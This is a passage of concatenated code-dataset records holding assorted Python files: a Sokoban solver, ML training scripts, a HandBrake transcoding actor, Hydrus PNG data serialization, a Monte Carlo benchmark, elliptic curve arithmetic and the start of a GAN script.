row in plane for cell in row)\n states = fac_frac(empty, crates + 1) // fac_frac(crates)\n\n g, idx_to_cell, cell_to_idx = generate_graph(plane)\n\n start = get_start_state(plane, cell_to_idx)\n ends = list(get_end_states(plane, cell_to_idx))\n\n shortest = states,\n for end in ends:\n p = nx.shortest_path(g, start, end)\n shortest = min(shortest, (len(p), p))\n\n return coords_to_moves([idx_to_cell[x] for x, _ in shortest[1]])\n\n\nRESOURCES = {\n ' ': Image.open('../resources/w12/tile_empty.png'),\n 'x': Image.open('../resources/w12/tile_goal.png'),\n '#': Image.open('../resources/w12/tile_wall.png'),\n\n 'c': Image.open('../resources/w12/tile_crate.png'),\n 's': Image.open('../resources/w12/tile_sokoban.png'),\n\n}\n\n\ndef draw_state(game, crates, sokoban, tile_size=32):\n frame = Image.new('RGBA', (len(game) * tile_size, len(game[0]) * tile_size, ), color=(0, 0, 0, 255))\n for ridx, row in enumerate(game):\n for cidx, cell in enumerate(row):\n frame.paste(RESOURCES[cell],\n (tile_size * ridx, tile_size * cidx, tile_size * (ridx + 1), tile_size * (cidx + 1)))\n for crate in crates:\n frame.paste(RESOURCES['c'],\n ((tile_size * crate[0], tile_size * crate[1], tile_size * (crate[0] + 1),\n tile_size * (crate[1] + 1))),\n mask=RESOURCES['c'])\n frame.paste(RESOURCES['s'],\n ((tile_size * sokoban[0], tile_size * sokoban[1], tile_size * (sokoban[0] + 1),\n tile_size * (sokoban[1] + 1))),\n mask=RESOURCES['s'])\n return frame\n\n\ndef animate_sokoban(fn, out_fn):\n moves = solve_sokoban(fn)\n with open(fn, 'r') as fd:\n game = load_map(fd)\n crates = set()\n sokoban = None\n for ridx, row in enumerate(game):\n for cidx, cell in enumerate(row):\n if cell == 'c':\n row[cidx] = ' '\n crates.add((ridx, cidx))\n elif cell == 's':\n row[cidx] = ' '\n sokoban = (ridx, cidx)\n frames = [draw_state(game, crates, sokoban)]\n for move in moves:\n delta = {'UP': (-1, 0), 'DOWN': (1, 0), 'LEFT': (0, -1), 'RIGHT': (0, 1)}[move]\n sokoban = add_tuple(sokoban, delta)\n if sokoban in crates:\n crates.remove(sokoban)\n crates.add(add_tuple(sokoban, delta))\n frames.append(draw_state(game, crates, sokoban))\n images.save_gif(frames, out_fn, duration=500)\n\n\nclass PartB(Base):\n name = 'B'\n\n def run(self, fnprovider: AbstractFilenameProvider):\n \"\"\"Sokoban. 
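# --- editor's note: hedged sketch, not from the repo above. solve_sokoban()
# runs nx.shortest_path once per goal state. An equivalent single-query
# formulation adds one virtual sink reachable from every goal, so the BFS
# covers all goals at once (shortest_to_any is a hypothetical name):
import networkx as nx

def shortest_to_any(g: nx.DiGraph, start, ends):
    sink = object()  # unique, hashable virtual node
    g.add_edges_from((end, sink) for end in ends)
    try:
        path = nx.shortest_path(g, start, sink)[:-1]  # drop the sink again
    finally:
        g.remove_node(sink)  # leave the caller's graph unchanged
    return path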
Prevzaté z https://www.umimematiku.cz\"\"\"\n animate_sokoban('../resources/w12/sokoban1.txt', fnprovider.get_filename('.gif', 'simple', \"Simple\"))\n animate_sokoban('../resources/w12/sokoban2.txt', fnprovider.get_filename('.gif', 'hard', 'Hard'))\n animate_sokoban('../resources/w12/sokoban3.txt', fnprovider.get_filename('.gif', 'slides', 'Slides'))\n return fnprovider.format_files()\n","repo_name":"jksdf/IV122","sub_path":"src/week12/PartB.py","file_name":"PartB.py","file_ext":"py","file_size_in_byte":6849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74145102498","text":"import os\nimport json\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\n\n\ndef save_lr_to_file(lr, dirname):\n with open(os.path.join(dirname, 'lr.json'), 'w') as lr_file:\n json.dump({\n 'init_params': lr.get_params(),\n 'model_params': {\n p:getattr(lr, p).tolist() for p in ('coef_', 'intercept_','classes_', 'n_iter_')\n }\n },\n lr_file,\n indent = 4)\n\nx = np.arange(10).reshape(-1, 1)\ny = np.array([0, 1, 0, 0, 1, 1, 1, 1, 1, 1])\n\nmodel = LogisticRegression(solver='liblinear', C=10.0, random_state=0)\nmodel.fit(x, y)\np_pred = model.predict_proba(x)\nprint(p_pred)\nsave_lr_to_file(model, './')","repo_name":"fredrikluo/mlserving","sub_path":"pkg/scikitlearn/test_data/test_data_gen.py","file_name":"test_data_gen.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"26492767070","text":"from thespian.actors import ActorTypeDispatcher\nimport os\nimport subprocess\nfrom datetime import timedelta\nimport re\nfrom ..models import JobState, TranscodeJob\nfrom . import messages as m\nimport logging\n\n\nclass Transcoder(ActorTypeDispatcher):\n def __init__(self):\n super(Transcoder, self).__init__()\n self.manager = None\n self.job_queue = None\n self.job = None\n self.command = 'HandBrakeCLI -i {0} -o {1} --preset = \"High Profile\" --subtitle scan -F'\n self.process = None\n self.progress_regex = re.compile('Encoding:.* (?P\\d{0,2})(.\\d{2} %)')\n self.progress = 0\n\n @staticmethod\n def actorSystemCapabilityCheck(capabilities, requirements):\n res = True\n res = res and capabilities['HostName'] == requirements['HostName']\n return res\n\n def receiveMsg_InitTranscoder(self, message, sender):\n logging.info('Starting Transcode of {0}'.format(message.job.relative_file))\n self.job = message.job\n self.manager = sender\n self.job_queue = message.job_queue\n\n folder = os.path.split(self.job.output_file)[0]\n if not os.path.exists(folder):\n os.makedirs(folder)\n folder = os.path.split(self.job.output_file)[0]\n\n command = ['HandBrakeCLI',\n '-i',\n self.job.input_file,\n '-o',\n self.job.output_file,\n '--preset=High Profile',\n '--subtitle',\n 'scan',\n '-F']\n\n self.process = subprocess.Popen(command,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n self.wakeupAfter(timedelta(seconds=0.1))\n\n def receiveMsg_WakeupMessage(self, message, sender):\n # Pull a line off stdout searching for carriage return\n # HandBrakeCLI overwrites the same line repeatedly\n # logging.debug('Reading next line from Handbrake.')\n line = ''\n while line[-1:] != '\\r' and self.process.poll() is None:\n line = line + bytes.decode(self.process.stdout.read(1))\n\n progress = self._find_transcode_progress(line)\n if progress != self.progress:\n self.progress = progress\n self.send(self.job_queue, m.UpdateTranscodeJob(job_id=self.job.id,\n 
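# --- editor's note: hedged counterpart to save_lr_to_file in the sklearn
# record above; load_lr_from_file is a hypothetical name, not part of that
# record. It rebuilds the estimator from the JSON dump by restoring the init
# params and the fitted arrays that were saved.
import json
import os
import numpy as np
from sklearn.linear_model import LogisticRegression

def load_lr_from_file(dirname):
    with open(os.path.join(dirname, 'lr.json')) as lr_file:
        payload = json.load(lr_file)
    lr = LogisticRegression(**payload['init_params'])
    for name, value in payload['model_params'].items():
        # restores coef_, intercept_, classes_, n_iter_ as numpy arrays
        setattr(lr, name, np.array(value))
    return lr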
state=JobState.TRANSCODING,\n progress=progress))\n\n if self.process.poll() is not None:\n logging.debug('Transcoder completed with return code %s', self.process.poll())\n self.send(self.manager, m.FileTranscodeComplete(self.process.poll()))\n else:\n self.wakeupAfter(timedelta(seconds=0.1))\n\n def _find_transcode_progress(self, line):\n result = self.progress_regex.match(line)\n progress = None\n if result is not None:\n progress = result.groupdict().get('progress', None)\n return progress\n","repo_name":"scottessner/multi-machine-ripper","sub_path":"mmr/actors/transcoder.py","file_name":"transcoder.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15970950431","text":"# Задача 3\n# В массиве случайных целых чисел поменять местами минимальный и максимальный элементы.\n# Блок-схема - https://drive.google.com/file/d/1EVjfVBiV0WAgJ0KhTbFDs31skxbVVBoe/view?usp=sharing\n\nfrom random import randint\n\nmy_mssv = [randint(0, 100) for i in range(10)]\nprint('Исходный массив:', my_mssv)\n\nmn = 0\nmx = 0\nmax_el = my_mssv[0]\nmin_el = my_mssv[0]\n\nfor i in my_mssv:\n\n if i > max_el:\n max_el = i\n mx = my_mssv.index(i)\n\n elif i < min_el:\n min_el = i\n mn = my_mssv.index(i)\n\nmy_mssv[mx], my_mssv[mn] = my_mssv[mn], my_mssv[mx]\n\nprint('Максимальный элемент -', max_el, '\\nМинимальный элемент -', min_el)\nprint('Массив с переставленными max и min элементами', my_mssv)\n\n\n\n","repo_name":"cappuccino23/PyAlgorithms","sub_path":"Lesson 3/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12653930225","text":"#_*_coding:utf8_*_\nimport cv2\nimport numpy as np\nimport os\nfrom neural_network import nn\n\n# 运行前请解压dataset.zip得到training_img和test_img\ndef get_training_data(dataset_dir):\n images = []\n labels = []\n train_dir = os.path.join(dataset_dir, \"train\")\n files = os.listdir(train_dir) #获取训练数据列表\n np.random.shuffle(files)\n for f in files: #读取每一张图片,并加入到样本中\n img_path = os.path.join(train_dir, f)\n img = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) #以灰度图的格式读取\n img = img.flatten() #默认读取的是32 * 32, 展开成1024维\n images.append(img) #样本加入list中\n num = int(f[0]) #文件名的第一个字符就是标签,这里需要转成int型, 例如8_001.jpg是数字8\n label = np.zeros(10)\n label[num] = 1 #标签是以one-hot方式存放的,举���[0,0,1,0,0,0,0,0,0,0]代表2\n labels.append(label) #图片对应标签也加入到list\n return (np.float32(images), np.float32(labels)) #转换为numpy 的数组用于训练\n\nimages, labels = get_training_data(\"dataset\") #获取训练数据\nnet = nn(1024, 16, 10) \nnet.train(images, labels)\nnet.save(\"mnist.npy\")\n","repo_name":"xiaowei305/perception","sub_path":"ch1/nn_mnist/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"20870239231","text":"import ClientConstants as CC\nimport ClientImageHandling\nimport ClientImporting\nimport ClientParsing\nimport cv2\nimport HydrusConstants as HC\nimport HydrusData\nimport HydrusPaths\nimport HydrusSerialisable\nimport numpy\nimport os\nimport shutil\nimport struct\nimport wx\n\nif cv2.__version__.startswith( '2' ):\n \n IMREAD_UNCHANGED = cv2.CV_LOAD_IMAGE_UNCHANGED\n \nelse:\n \n IMREAD_UNCHANGED = cv2.IMREAD_UNCHANGED\n \n\npng_font = cv2.FONT_HERSHEY_TRIPLEX\ngreyscale_text_color = 0\n\ntitle_size = 0.7\npayload_description_size = 0.5\ntext_size = 0.4\n\ndef 
CreateTopImage( width, title, payload_description, text ):\n \n text_extent_bmp = wx.Bitmap( 20, 20, 24 )\n \n dc = wx.MemoryDC( text_extent_bmp )\n \n text_font = wx.SystemSettings.GetFont( wx.SYS_DEFAULT_GUI_FONT )\n \n basic_font_size = text_font.GetPointSize()\n \n payload_description_font = wx.SystemSettings.GetFont( wx.SYS_DEFAULT_GUI_FONT )\n \n payload_description_font.SetPointSize( int( basic_font_size * 1.4 ) )\n \n title_font = wx.SystemSettings.GetFont( wx.SYS_DEFAULT_GUI_FONT )\n \n title_font.SetPointSize( int( basic_font_size * 2.0 ) )\n \n dc.SetFont( text_font )\n ( gumpf, text_line_height ) = dc.GetTextExtent( 'abcdefghijklmnopqrstuvwxyz' )\n \n dc.SetFont( payload_description_font )\n ( gumpf, payload_description_line_height ) = dc.GetTextExtent( 'abcdefghijklmnopqrstuvwxyz' )\n \n dc.SetFont( title_font )\n ( gumpf, title_line_height ) = dc.GetTextExtent( 'abcdefghijklmnopqrstuvwxyz' )\n \n del dc\n del text_extent_bmp\n \n text_lines = WrapText( text, width, text_size, 1 )\n \n if len( text_lines ) == 0:\n \n text_total_height = 0\n \n else:\n \n text_total_height = ( text_line_height + 4 ) * len( text_lines )\n \n text_total_height += 6 # to bring the last 4 padding up to 10 padding\n \n \n top_height = 10 + title_line_height + 10 + payload_description_line_height + 10 + text_total_height\n \n #\n \n top_bmp = wx.Bitmap( width, top_height, 24 )\n \n dc = wx.MemoryDC( top_bmp )\n \n dc.SetBackground( wx.Brush( wx.WHITE ) )\n \n dc.Clear()\n \n #\n \n dc.DrawBitmap( CC.GlobalBMPs.file_repository, width - 16 - 5, 5 )\n \n #\n \n current_y = 10\n \n dc.SetFont( title_font )\n \n ( t_width, t_height ) = dc.GetTextExtent( title )\n \n dc.DrawText( title, ( width - t_width ) / 2, current_y )\n \n current_y += t_height + 10\n \n dc.SetFont( payload_description_font )\n \n ( t_width, t_height ) = dc.GetTextExtent( payload_description )\n \n dc.DrawText( payload_description, ( width - t_width ) / 2, current_y )\n \n current_y += t_height + 10\n \n dc.SetFont( text_font )\n \n for text_line in text_lines:\n \n ( t_width, t_height ) = dc.GetTextExtent( text_line )\n \n dc.DrawText( text_line, ( width - t_width ) / 2, current_y )\n \n current_y += t_height + 4\n \n \n del dc\n \n data = top_bmp.ConvertToImage().GetData()\n \n data = buffer( data ) # wx phoenix thing--bmp now delivers a bytearray, but numpy wants a buffer, wew\n \n top_image_rgb = numpy.fromstring( data, dtype = 'uint8' ).reshape( ( top_height, width, 3 ) )\n \n top_bmp.Destroy()\n \n top_image = cv2.cvtColor( top_image_rgb, cv2.COLOR_RGB2GRAY )\n \n top_height_header = struct.pack( '!H', top_height )\n \n ( byte0, byte1 ) = top_height_header\n \n top_image[0][0] = ord( byte0 )\n top_image[0][1] = ord( byte1 )\n \n return top_image\n \ndef DumpToPng( width, payload, title, payload_description, text, path ):\n \n payload_length = len( payload )\n \n payload_string_length = payload_length + 4\n \n payload_height = int( float( payload_string_length ) / width )\n \n if float( payload_string_length ) / width % 1.0 > 0:\n \n payload_height += 1\n \n \n top_image = CreateTopImage( width, title, payload_description, text )\n \n payload_length_header = struct.pack( '!I', payload_length )\n \n num_empty_bytes = payload_height * width - payload_string_length\n \n full_payload_string = payload_length_header + payload + '\\x00' * num_empty_bytes\n \n payload_image = numpy.fromstring( full_payload_string, dtype = 'uint8' ).reshape( ( payload_height, width ) )\n \n finished_image = numpy.concatenate( ( top_image, payload_image ) 
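# --- editor's note: hedged aside on CreateTopImage above. That record is
# Python 2 code (buffer(), unicode, ord() on pack() output); it stores the
# rendered header's height big-endian in the first two pixel bytes, and
# LoadFromPng later unpacks it the same way. The Python 3 equivalent of that
# round trip, as a standalone check:
import struct

top_height = 123
byte0, byte1 = struct.pack('!H', top_height)  # bytes iterate as ints in Py3
assert struct.unpack('!H', bytes([byte0, byte1]))[0] == top_height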
)\n \n # this is to deal with unicode paths, which cv2 can't handle\n ( os_file_handle, temp_path ) = HydrusPaths.GetTempPath( suffix = '.png' )\n \n try:\n \n cv2.imwrite( temp_path, finished_image, [ cv2.IMWRITE_PNG_COMPRESSION, 9 ] )\n \n shutil.copy2( temp_path, path )\n \n except Exception as e:\n \n HydrusData.ShowException( e )\n \n raise Exception( 'Could not save the png!' )\n \n finally:\n \n HydrusPaths.CleanUpTempPath( os_file_handle, temp_path )\n \n \ndef GetPayloadString( payload_obj ):\n \n if isinstance( payload_obj, ( str, unicode ) ):\n \n return HydrusData.ToByteString( payload_obj )\n \n else:\n \n return payload_obj.DumpToNetworkString()\n \n \ndef GetPayloadTypeString( payload_obj ):\n \n if isinstance( payload_obj, ( str, unicode ) ):\n \n return 'String'\n \n elif isinstance( payload_obj, HydrusSerialisable.SerialisableList ):\n \n return 'A list of ' + HydrusData.ConvertIntToPrettyString( len( payload_obj ) ) + ' ' + GetPayloadTypeString( payload_obj[0] )\n \n elif isinstance( payload_obj, HydrusSerialisable.SerialisableBase ):\n \n return payload_obj.SERIALISABLE_NAME\n \n else:\n \n return repr( type( payload_obj ) )\n \n \ndef GetPayloadDescriptionAndString( payload_obj ):\n \n payload_string = GetPayloadString( payload_obj )\n \n payload_description = GetPayloadTypeString( payload_obj ) + ' - ' + HydrusData.ConvertIntToBytes( len( payload_string ) )\n \n return ( payload_description, payload_string )\n \ndef LoadFromPng( path ):\n \n # this is to deal with unicode paths, which cv2 can't handle\n ( os_file_handle, temp_path ) = HydrusPaths.GetTempPath()\n \n try:\n \n shutil.copy2( path, temp_path )\n \n numpy_image = cv2.imread( temp_path, flags = IMREAD_UNCHANGED )\n \n except Exception as e:\n \n HydrusData.ShowException( e )\n \n raise Exception( 'That did not appear to be a valid image!' )\n \n finally:\n \n HydrusPaths.CleanUpTempPath( os_file_handle, temp_path )\n \n \n try:\n \n ( height, width ) = numpy_image.shape\n \n complete_data = numpy_image.tostring()\n \n top_height_header = complete_data[:2]\n \n ( top_height, ) = struct.unpack( '!H', top_height_header )\n \n full_payload_string = complete_data[ width * top_height : ]\n \n payload_length_header = full_payload_string[:4]\n \n ( payload_length, ) = struct.unpack( '!I', payload_length_header )\n \n payload = full_payload_string[ 4 : 4 + payload_length ]\n \n except Exception as e:\n \n HydrusData.ShowException( e )\n \n raise Exception( 'The image was fine, but it did not seem to have hydrus data encoded in it!' 
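# --- editor's note: hedged aside on DumpToPng above, not a change to the
# record. Its two-step float computation of payload_height is integer ceiling
# division; the usual pure-integer idiom is:
def rows_needed(payload_string_length: int, width: int) -> int:
    return (payload_string_length + width - 1) // width

assert rows_needed(10, 4) == 3 and rows_needed(8, 4) == 2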
)\n \n \n return payload\n \ndef TextExceedsWidth( text, width, size, thickness ):\n \n ( ( tw, th ), baseline ) = cv2.getTextSize( text, png_font, size, thickness )\n \n return tw > width\n \ndef WrapText( text, width, size, thickness ):\n \n words = text.split( ' ' )\n \n lines = []\n \n next_line = []\n \n for word in words:\n \n if word == '':\n \n continue\n \n \n potential_next_line = list( next_line )\n \n potential_next_line.append( word )\n \n if TextExceedsWidth( ' '.join( potential_next_line ), width, size, thickness ):\n \n if len( potential_next_line ) == 1: # one very long word\n \n lines.append( ' '.join( potential_next_line ) )\n \n next_line = []\n \n else:\n \n lines.append( ' '.join( next_line ) )\n \n next_line = [ word ]\n \n \n else:\n \n next_line = potential_next_line\n \n \n \n if len( next_line ) > 0:\n \n lines.append( ' '.join( next_line ) )\n \n \n return lines\n \n","repo_name":"Xaegrek/hydrus","sub_path":"include/ClientSerialisable.py","file_name":"ClientSerialisable.py","file_ext":"py","file_size_in_byte":8723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"9795008981","text":"#!/usr/bin/env python3\nfrom monte_carlo import *\nfrom monte_carlo_numba import *\n\nif __name__ == \"__main__\":\n print(\"Ищем интеграл функции сos(x) на [0,pi/2]\")\n print(\"c помощью формул с матанализа понимаем, что он равен 1\")\n N = 100000000\n t0 = time.time()\n print(\"Считаем по-простому\")\n cos_integral_val = cos_integral(N)\n print(\n f\"{cos_integral_val} - значение ,посчитали за {time.time() - t0} сек\"\n )\n print(\"Считаем с nubma\")\n t0 = time.time()\n cos_integral_jit_val = cos_integral_jit(N)\n print(\n f\"{cos_integral_jit_val} - значение ,посчитали за {time.time() - t0} сек\"\n )\n\n","repo_name":"AlexanderTitilin/spbau_python","sub_path":"monte_carlo_numba/bench.py","file_name":"bench.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38366174080","text":"\nfrom django.test import TestCase\n\nfrom product.factories import CategoryFactory, ProductFactory\nfrom product.serializers import CategorySerializer\n\n\nclass TestCategorySerializer(TestCase):\n def setUp(self) -> None:\n self.category = CategoryFactory(title=\"food\")\n self.category_serializer = CategorySerializer(self.category)\n\n def test_order_serializer(self):\n serializer_data = self.category_serializer.data\n\n self.assertEquals(serializer_data[\"title\"], \"food\")\n","repo_name":"fxbrartur/djangorest","sub_path":"product/tests/test_serializers/test_category_serializer.py","file_name":"test_category_serializer.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"1936833069","text":"import math\n\n\ndef is_prime(n):\n \"\"\"\n from an answer\n # https://stackoverflow.com/questions/18833759/python-prime-number-checker\n # bruteforce check\n \"\"\"\n if n <= 2:\n return True\n if n % 2 == 0:\n return False\n return all(n % i for i in range(3, int(math.sqrt(n)) + 1, 2))\n\n# from an answer\n# https://stackoverflow.com/questions/31074172/elliptic-curve-point-addition-over-a-finite-field-in-python\n\n\nclass ECMPoint(object):\n O = POINT_INFINITY = \"inf\"\n\n def __init__(self, x: int, y: int, ec: 'EllipticCurveModulo'):\n self.x = x\n self.y = y\n self.ec = ec\n\n def __mul__(self, mult: int):\n # dumb mult\n result = self.ec.point(self.x, 
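# --- editor's note: the is_prime in the record above returns True for every
# n <= 2, so 0 and 1 are misclassified as prime. A corrected standalone
# version using the same trial-division approach, offered as a hedged sketch
# rather than a change to the record:
import math

def is_prime_fixed(n: int) -> bool:
    if n < 2:
        return False
    if n == 2:
        return True
    if n % 2 == 0:
        return False
    return all(n % i for i in range(3, int(math.sqrt(n)) + 1, 2))

assert [k for k in range(10) if is_prime_fixed(k)] == [2, 3, 5, 7]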
self.y)\n for i in range(mult):\n result = self.ec.ec_add(result, self)\n return result\n\n def __add__(self, p: 'ECMPoint'):\n return self.ec.ec_add(self, p)\n\n def __sub__(self, p: 'ECMPoint'):\n return self.ec.ec_add(self, self.ec.ec_inv(p))\n\n def __invert__(self):\n return self.ec.ec_inv(self)\n\n def __repr__(self):\n return \"ECMPoint({}, {})\".format(self.x, self.y)\n\n def __eq__(self, p: 'ECMPoint'):\n return p is not None and p != ECMPoint.O and self.x == p.x and self.y == p.y and self.ec == p.ec\n\n def __hash__(self):\n return hash((self.x, self.y))\n\n\n# elliptic curve like y^2 = x^3 + a*x + b\nclass EllipticCurveModulo(object):\n class FullPointIter(object):\n def __init__(self, ec: 'EllipticCurveModulo'):\n self.x = 0 # type: int\n self.ec = ec\n self.make_inverse = False\n self.point_cache = None # type: ECMPoint\n self.squares_y = dict([(y**2 % ec._mod, y) for y in range(int(ec._mod/2 + 1))])\n\n def next(self) -> ECMPoint:\n while self.x < self.ec._mod:\n not_ok = True\n if self.make_inverse:\n self.x += 1\n if self.point_cache.y != 0:\n not_ok = False\n self.point_cache.y = -self.point_cache.y % self.ec._mod\n else:\n while not_ok:\n y = self.squares_y.get(self.ec.eval_x(self.x))\n if y is None:\n self.x += 1\n else:\n not_ok = False\n self.point_cache = self.ec.point(self.x, y)\n self.make_inverse = not self.make_inverse\n if not not_ok:\n return self.ec.point(self.point_cache.x, self.point_cache.y)\n raise StopIteration()\n\n def __iter__(self):\n return self\n\n def __next__(self):\n return self.next()\n\n class PointIter(object):\n def __init__(self, gen_point: ECMPoint, ec: 'EllipticCurveModulo'):\n self.gen_point = gen_point\n self.inter_point = None # type: ECMPoint\n self.ec = ec\n self.max_gen = 1\n\n def next(self) -> ECMPoint:\n if self.inter_point != ECMPoint.O:\n if self.inter_point is not None:\n self.inter_point = self.gen_point + self.inter_point\n else:\n self.inter_point = self.ec.point(self.gen_point.x, self.gen_point.y)\n return self.inter_point if self.inter_point == ECMPoint.O else self.ec.point(self.inter_point.x, self.inter_point.y)\n else:\n raise StopIteration()\n\n def __iter__(self):\n return self\n\n # Python 3 compatibility\n def __next__(self):\n return self.next()\n\n def __init__(self, a: int, b: int, mod: int):\n self._mod = mod\n self._a = a\n self._b = b\n self.__size__ = None # type: int\n\n def old_point_begin(self) -> 'PointIter':\n for x in range(0, self._mod):\n try:\n p = self.eval(x)\n return EllipticCurveModulo.PointIter(p, self)\n except ValueError:\n pass\n\n def point_begin(self) -> 'FullPointIter':\n return EllipticCurveModulo.FullPointIter(self)\n\n def eval_x(self, x: int) -> int:\n x = x % self._mod\n return (x ** 3 + self._a * x + self._b) % self._mod\n\n def eval(self, x) -> ECMPoint:\n y_square = self.eval_x(x)\n # find a square root by brute force\n for y in range(self._mod):\n if y**2 % self._mod == y_square:\n return self.point(x, y)\n raise ValueError(\"given x cannot evaluate a point (no square root from {} modulo {})\".format(y_square, self._mod))\n\n def check(self, crypto_check: bool = True, raise_error=True) -> bool:\n if self._mod <= 2:\n if raise_error:\n raise ValueError(\"_mod value '{}' is incorrect (<=2)!\".format(self._mod))\n return False\n if not is_prime(self._mod):\n if raise_error:\n raise ValueError(\"_mod value '{}' is incorrect (not prime)!\".format(self._mod))\n return False\n if crypto_check and ((4*self._a**3 % self._mod) + (27*self._b**2 % self._mod) % self._mod) % self._mod == 0:\n if 
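# --- editor's note: hedged aside on eval() above, which brute-forces a modular
# square root by scanning all residues. For primes p ≡ 3 (mod 4) the root has
# a closed form; this is standard number theory, not code from the repo:
def sqrt_mod_p3(a: int, p: int) -> int:
    # valid only when p % 4 == 3 and a is a quadratic residue mod p
    r = pow(a, (p + 1) // 4, p)
    if r * r % p != a % p:
        raise ValueError("a is not a quadratic residue mod p")
    return r

assert sqrt_mod_p3(2, 7) in (3, 4)  # 3*3 = 9 ≡ 2 and 4*4 = 16 ≡ 2 (mod 7)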
raise_error:\n raise ValueError(\"EC is singular: 4*a^3 + 27*b^2 is zero mod p (crypto check) \"\n \"with a={},b={},p={}\".format(self._a, self._b, self._mod))\n return False\n return True\n\n def valid(self, p: ECMPoint):\n \"\"\"\n Determine whether we have a valid representation of a point\n on our curve. We assume that the x and y coordinates\n are always reduced modulo p, so that we can compare\n two points for equality with a simple ==.\n \"\"\"\n if p == ECMPoint.O:\n return True\n elif p.ec != self:\n return False\n else:\n return ((p.y ** 2 - (p.x ** 3 + self._a * p.x + self._b)) % self._mod == 0 and\n 0 <= p.x < self._mod and 0 <= p.y < self._mod)\n\n def point(self, x, y) -> ECMPoint:\n return ECMPoint(x, y, self)\n\n @property\n def size(self) -> int:\n if self.__size__ is None:\n self.__size__ = sum(1 for _ in self.point_begin()) # type: int\n return self.__size__\n\n def size_hasse_check(self) -> bool:\n s = self.size\n return abs(s - self._mod - 1) < 2*math.sqrt(self._mod)\n\n def inv_mod(self, x):\n \"\"\"\n Compute an inverse for x modulo p, assuming that x\n is not divisible by p.\n \"\"\"\n if x % self._mod == 0:\n raise ZeroDivisionError(\"Impossible inverse\")\n # three-args pow - ( x^p-2 mod p )\n # if mod is prime - result is always an inverse (because x^(p-1) = 1 mod p)\n return pow(x, self._mod-2, self._mod)\n\n def ec_inv(self, p: ECMPoint, check=True) -> ECMPoint:\n \"\"\"\n Inverse of the point P on the elliptic curve y^2 = x^3 + ax + b.\n \"\"\"\n if check and not self.valid(p):\n raise ValueError(\"Point '{}' is invalid\".format(p))\n if p == ECMPoint.O:\n return p\n return ECMPoint(p.x, (-p.y) % self._mod, self)\n\n def ec_add(self, p: ECMPoint, q: ECMPoint, check=True):\n \"\"\"\n Sum of the points P and Q on the elliptic curve y^2 = x^3 + ax + b.\n \"\"\"\n if check and not self.valid(p):\n raise ValueError(\"Point '{}' is invalid\".format(p))\n\n # Deal with the special cases where either P, Q, or P + Q is\n # the origin.\n if p == ECMPoint.O:\n result = q\n elif q == ECMPoint.O:\n result = p\n elif q == self.ec_inv(p, check=False):\n result = ECMPoint.O\n else:\n # Cases not involving the origin.\n if p == q:\n dydx = (3 * p.x ** 2 + self._a) * self.inv_mod(2 * p.y)\n else:\n dydx = (q.y - p.y) * self.inv_mod(q.x - p.x)\n\n x = int((dydx ** 2 - p.x - q.x) % self._mod)\n y = int((dydx * (p.x - x) - p.y) % self._mod)\n result = ECMPoint(x, y, self)\n\n # The above computations *should* have given us another point\n # on the curve.\n assert self.valid(result)\n return result\n\n def __repr__(self):\n return \"EllipticCurveModulo({}, {}, {}) =\" \\\n \" 'y^2 = x^3 + {}x + {} mod {}'\".format(*((self._a, self._b, self._mod)*2))\n\n","repo_name":"FakeEmperor/elliptic-curve-math","sub_path":"kily/math/ec/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3115720190","text":"import torch\nimport torch.nn as nn\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torch.autograd import Variable\nfrom torchvision.utils import save_image\nfrom tqdm import tqdm\n\nbatch_size = 64\nnoise_size = 100\ntotal_epoch = 100\n\n\ndef to_var(x):\n if torch.cuda.is_available():\n x = x.cuda()\n return Variable(x)\n\n\ndef get_noise(x_size):\n return torch.randn(x_size, noise_size)\n\n\n# Image processing\ntransform = transforms.Compose([\n transforms.Grayscale(),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 
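# --- editor's note: hedged modernization aside on the GAN record above.
# torch.autograd.Variable (used in its to_var helper) has been a no-op wrapper
# since PyTorch 0.4; the same helper today is just device placement:
import torch

device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')

def to_device(x: torch.Tensor) -> torch.Tensor:
    return x.to(device)

# usage: noise = to_device(torch.randn(64, 100))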
